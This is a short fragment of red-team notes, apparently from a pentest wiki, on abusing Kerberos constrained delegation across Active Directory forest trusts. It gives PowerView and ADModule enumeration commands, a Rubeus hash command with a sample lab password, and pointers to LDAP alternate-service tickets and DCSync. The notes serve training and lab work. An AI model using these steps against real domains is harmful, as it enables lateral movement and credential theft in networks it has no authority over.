constrained-delegation
The classic Constrained Delegation does not work across forest trusts. But we can abuse it once we have a beachhead/foothold across forest trust.
Powershell
PowerView
Get-DomainUser –TrustedToAuth -Domain <target>
Get-DomainComputer –TrustedToAuth -Domain <target>ADModule
Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo -Server <target>Binaries
[!INFO] Remember to follow the Binaries methodology
Rubeus
We can request an alternate ticket using Rubeus
C:\AD\Tools\Rubeus.exe hash /password:Qwerty@2019 /user:storagesvc /domain:eu.localGet creds for compromised user and request ldap altservice
note that use of AES256 may not work across forests as it depends on whether or not AES encryption is supported
DCSync
Last updated